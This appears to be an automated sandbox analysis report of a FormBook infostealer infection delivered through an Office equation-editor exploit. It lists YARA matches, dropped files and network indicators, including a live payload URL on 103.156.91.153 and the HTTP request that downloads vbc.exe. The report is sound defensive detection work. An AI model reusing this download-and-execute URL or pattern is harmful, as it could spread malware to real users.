          Source: unknownTCP traffic detected without corresponding DNS query: 103.156.91.153
          Source: unknownTCP traffic detected without corresponding DNS query: 103.156.91.153
          Source: unknownTCP traffic detected without corresponding DNS query: 103.156.91.153
          Source: unknownTCP traffic detected without corresponding DNS query: 103.156.91.153
          Source: unknownTCP traffic detected without corresponding DNS query: 103.156.91.153
          Source: unknownTCP traffic detected without corresponding DNS query: 103.156.91.153
          Source: unknownTCP traffic detected without corresponding DNS query: 103.156.91.153
          Source: unknownTCP traffic detected without corresponding DNS query: 103.156.91.153
          Source: unknownTCP traffic detected without corresponding DNS query: 103.156.91.153
          Source: unknownTCP traffic detected without corresponding DNS query: 103.156.91.153
          Source: unknownTCP traffic detected without corresponding DNS query: 103.156.91.153
          Source: unknownTCP traffic detected without corresponding DNS query: 103.156.91.153
          Source: unknownTCP traffic detected without corresponding DNS query: 103.156.91.153
          Source: unknownTCP traffic detected without corresponding DNS query: 103.156.91.153
          Source: unknownTCP traffic detected without corresponding DNS query: 103.156.91.153
          Source: unknownTCP traffic detected without corresponding DNS query: 103.156.91.153
          Source: unknownTCP traffic detected without corresponding DNS query: 103.156.91.153
          Source: unknownTCP traffic detected without corresponding DNS query: 103.156.91.153
          Source: unknownTCP traffic detected without corresponding DNS query: 103.156.91.153
          Source: unknownTCP traffic detected without corresponding DNS query: 103.156.91.153
          Source: EQNEDT32.EXE, 00000002.00000002.965721686.000000000062E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.com2 equals www.linkedin.com (Linkedin)
          Source: explorer.exe, 00000007.00000000.1012455681.0000000003B10000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
          Source: EQNEDT32.EXE, 00000002.00000002.965721686.000000000062E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
          Source: EQNEDT32.EXE, 00000002.00000002.965721686.000000000062E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://103.156.91.153/fdcloudfiles/vbc.exe
          Source: EQNEDT32.EXE, 00000002.00000002.965721686.000000000062E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://103.156.91.153/fdcloudfiles/vbc.exehhC:
          Source: EQNEDT32.EXE, 00000002.00000002.965939065.00000000035D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.156.91.153/fdcloudfiles/vbc.exej
          Source: EQNEDT32.EXE, 00000002.00000002.965721686.000000000062E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://103.156.91.153/fdcloudfiles/vbc.exes
          Source: explorer.exe, 00000007.00000000.1015141560.00000000046D0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://computername/printers/printername/.printer
          Source: explorer.exe, 00000007.00000000.1012455681.0000000003B10000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://investor.msn.com
          Source: explorer.exe, 00000007.00000000.1012455681.0000000003B10000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://investor.msn.com/
          Source: explorer.exe, 00000007.00000000.983528544.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1034341934.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.996739649.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1009149384.0000000000335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://java.sun.com
          Source: explorer.exe, 00000007.00000000.1038912442.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
          Source: explorer.exe, 00000007.00000000.1038912442.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
          Source: vbc.exe, 00000004.00000002.987844954.000000000040A000.00000004.00000001.01000000.00000004.sdmp, vbc.exe, 00000004.00000000.964387400.000000000040A000.00000008.00000001.01000000.00000004.sdmp, vbc.exe.2.dr, vbc[1].exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: explorer.exe, 00000007.00000000.1034899702.0000000001DD0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: explorer.exe, 00000007.00000000.1003526577.0000000006450000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://servername/isapibackend.dll
          Source: explorer.exe, 00000007.00000000.1038912442.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
          Source: explorer.exe, 00000007.00000000.1015141560.00000000046D0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 00000007.00000000.1015141560.00000000046D0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
          Source: explorer.exe, 00000007.00000000.1038912442.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
          Source: explorer.exe, 00000007.00000000.1034899702.0000000001DD0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000007.00000000.983528544.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1034341934.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.996739649.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1009149384.0000000000335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3
          Source: explorer.exe, 00000007.00000000.1015141560.00000000046D0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
          Source: explorer.exe, 00000007.00000000.1012455681.0000000003B10000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.hotmail.com/oe
          Source: explorer.exe, 00000007.00000000.1038912442.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
          Source: explorer.exe, 00000007.00000000.1015141560.00000000046D0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
          Source: explorer.exe, 00000007.00000000.1012455681.0000000003B10000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
          Source: explorer.exe, 00000007.00000000.993794779.00000000084C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1019795394.0000000008807000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1006658399.0000000008575000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 00000007.00000000.994238368.0000000008611000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1019525973.0000000008611000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1006887265.0000000008611000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleaner1SPS0
          Source: explorer.exe, 00000007.00000000.1007066480.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.993998682.0000000008575000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1019426082.0000000008575000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.994421316.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1019795394.0000000008807000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1006658399.0000000008575000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: explorer.exe, 00000007.00000000.999156746.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1036163361.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1011925093.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.987988330.0000000002CBF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerq
          Source: explorer.exe, 00000007.00000000.1001945671.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.989754024.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1014187603.0000000004385000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerv
          Source: explorer.exe, 00000007.00000000.1012455681.0000000003B10000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.windows.com/pctv.
          Source: explorer.exe, 00000007.00000000.983528544.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1034341934.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.996739649.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1009149384.0000000000335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
          Source: explorer.exe, 00000007.00000000.983528544.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1034341934.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.996739649.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1009149384.0000000000335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
          Source: explorer.exe, 00000007.00000000.983528544.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1034341934.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.996739649.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1009149384.0000000000335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E4ED06E0.emfJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035D050B URLDownloadToFileW,ShellExecuteExW,ExitProcess,2_2_035D050B
          Source: global trafficHTTP traffic detected: GET /fdcloudfiles/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 103.156.91.153Connection: Keep-Alive
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0040580F GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,4_2_0040580F

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 6.0.bmexo.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.bmexo.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.bmexo.exe.170000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.bmexo.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.bmexo.exe.400000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.bmexo.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.bmexo.exe.170000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.bmexo.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.bmexo.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000006.00000000.977269250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.1173044498.0000000000300000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.976211361.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.1007465925.000000000A9D3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.1172863395.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.979111122.0000000000170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.1050132752.00000000000F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.1050273447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.1020176757.000000000A9D3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.1050307444.0000000000430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.1172976610.0000000000200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 6.0.bmexo.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.0.bmexo.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.0.bmexo.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.0.bmexo.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.bmexo.exe.170000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.bmexo.exe.170000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.bmexo.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.bmexo.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.0.bmexo.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.0.bmexo.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.bmexo.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.bmexo.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.bmexo.exe.170000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.bmexo.exe.170000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.0.bmexo.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.0.bmexo.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.977269250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.977269250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.1173044498.0000000000300000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.1173044498.0000000000300000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.976211361.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.976211361.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000000.1007465925.000000000A9D3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000000.1007465925.000000000A9D3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.1172863395.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.1172863395.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.979111122.0000000000170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.979111122.0000000000170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.1050132752.00000000000F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.1050132752.00000000000F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.1050273447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.1050273447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000000.1020176757.000000000A9D3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000000.1020176757.000000000A9D3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.1050307444.0000000000430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.1050307444.0000000000430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.1172976610.0000000000200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.1172976610.0000000000200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Office equation editor drops PE file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: 6.0.bmexo.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.0.bmexo.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.0.bmexo.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.0.bmexo.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.bmexo.exe.170000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.bmexo.exe.170000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.bmexo.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.bmexo.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.0.bmexo.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.0.bmexo.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.bmexo.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.bmexo.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.bmexo.exe.170000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.bmexo.exe.170000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.0.bmexo.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.0.bmexo.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.977269250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.977269250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.1173044498.0000000000300000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.1173044498.0000000000300000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.976211361.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.976211361.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000000.1007465925.000000000A9D3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000000.1007465925.000000000A9D3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
